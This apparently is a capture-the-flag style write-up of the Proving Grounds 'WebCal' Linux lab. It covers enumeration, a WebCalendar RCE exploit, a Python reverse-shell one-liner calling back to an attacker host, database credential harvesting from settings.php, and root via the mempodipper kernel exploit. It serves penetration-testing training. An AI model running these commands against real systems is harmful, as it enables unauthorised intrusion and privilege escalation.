> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/webcal.md).

# WebCal

Pg Practice WebCal writeup

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d11f50cc3db3eec32f11d4de9feb7908f670d79%2Fimage.png?alt=media)

## Nmap

```
sudo nmap 192.168.59.37 -sS -p- -sV 

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 5.8p1 Debian 7ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open  smtp    Postfix smtpd
53/tcp open  domain  ISC BIND 9.7.3
80/tcp open  http    Apache httpd 2.2.20 ((Ubuntu))
Service Info: Host:  ucal.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

## FTP

On port 21 we have Pure-FTPd running. I tried anonymous login and was unable to authenticate.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4d07092bc8a6e8eca400fd4ac4ea86f797ce87b1%2Fimage.png?alt=media)

## SMTP

I ran default scripts and version enumeration against port 25 and was unable to gain interesting information. I will instead move onto port 80 for the time being.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dac05aa6900c9045d4d67a55d84357241e24a4ba%2Fimage.png?alt=media)

## HTTP

The root page for Port 80 takes us to the following:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3321efc732493857291908729560e6a3f1bb8de%2Fimage.png?alt=media)

Before navigating the website I ran `nikto` and `dirsearch.py` for further enumeration.

![Dirsearch](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d8afccc1860ba07aa31f9e4ca33a6f919c9d5289%2Fimage.png?alt=media)

![Nikto](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-72cf246fc42ae0755eb693a2883aa689fec3ee0a%2Fimage.png?alt=media)

I looked through the discovered directories from `dirsearch.py` and was unable to identify any attack vectors. Looking through the output for `nikto` we do have a directory of /webcalendar/login.php.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa1c35734bafb9572c3a26b47ad5ea22b598bf26%2Fimage.png?alt=media)

We arrive at a login page for WebCalendar v1.2.3. I looked up default credentials which are admin:admin and was denied a valid login. I researched exploits for WebCalendar and came to a RCE exploit.

{% embed url="<https://www.exploit-db.com/exploits/18775>" %}

As per the defined usage in the exploit code I ran the exploit.

```
php exploit.php <IP> /webcalendar/
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a47444fa1c7a42dafc4f2c774048fa558b3bc8fe%2Fimage.png?alt=media)

We now have a shell on the target machine and we are running as the user www-data. I found with this shell that when you trying changing directories or running scripts it would have unexpected behaviour.

I performed a quick check to see if python was installed using `which python`. After confirming Python is installed I tried a quick one liner reverse shell to see if we can get a more stable one.

First I started a `netcat` listener on my attacking machine:

```
sudo nc -lvp 443
```

The run the following command on the target machine:

```
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'
```

We now have a more stable shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-339a21b626ba8d84981a680ca1fd8a6034bcd246%2Fimage.png?alt=media)

I changed to the /tmp/ directory and set up a `Python SimpleHTTPServer` on my attacking machine and downloaded `linpeas.sh` to assist with privilege escalation.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d4739ab1dc802cb1cfe4ca7e76ffe523a1e5e94f%2Fimage.png?alt=media)

After running `linpeas` I had some trouble identifying a privilege escalation vector and fell into some rabbit holes. I decided to go back some and Google search for other WebCal exploits. I come across the following exploit.

{% embed url="<https://www.exploit-db.com/exploits/40057>" %}

Except I was not actually interested in the exploit but in code we see a mention of database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-decaa623e645ecc211e189fe9d6039ed570c6c8f%2Fimage.png?alt=media)

I then looked for the settings.php file on the target machine which was on the /includes/ directory. Here I was able to find some database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ce1d030c5421cdabb86550f022a11a215c397bda%2Fimage.png?alt=media)

We have the credentials: `wc:edjfbxMT7KKo2PPC`

I was then enable to login to MySQL with the credentials we have gathered.

```
mysql -u wc -p 
```

I was then able to pull the WebCal admin username and password hash from the intranet database.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bbbd0eb08b5258326ad182d676ebc0ae6165810b%2Fimage.png?alt=media)

I ID'd the hash as being a MD5 hash. At this point I tried cracking with `hashcat` on multiple wordlists including rockyou.txt and was unable to crack.

After searching around for privilege escalation vectors I was absolutely stuck for an exploit. I then checked [linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0678277c5324aa8b8d361a4773fa31c5b19db1c5%2Fimage.png?alt=media)

The script directs to the memodipper exploit being a highly probable chance of exploitation. Download the exploit code and transfer it over to the target machine so we can compile.

{% embed url="<https://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c>" %}

I compiled the exploit with `gcc` and allowed the binary to be executable with `chmod`. Once completed I then called the exploit and was given a root shell.

```
gcc exploit.c -o exploit
chmod +x exploit
./exploit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-612d5dc52d0bbd8f477a680e87a81870b537397c%2Fimage.png?alt=media)
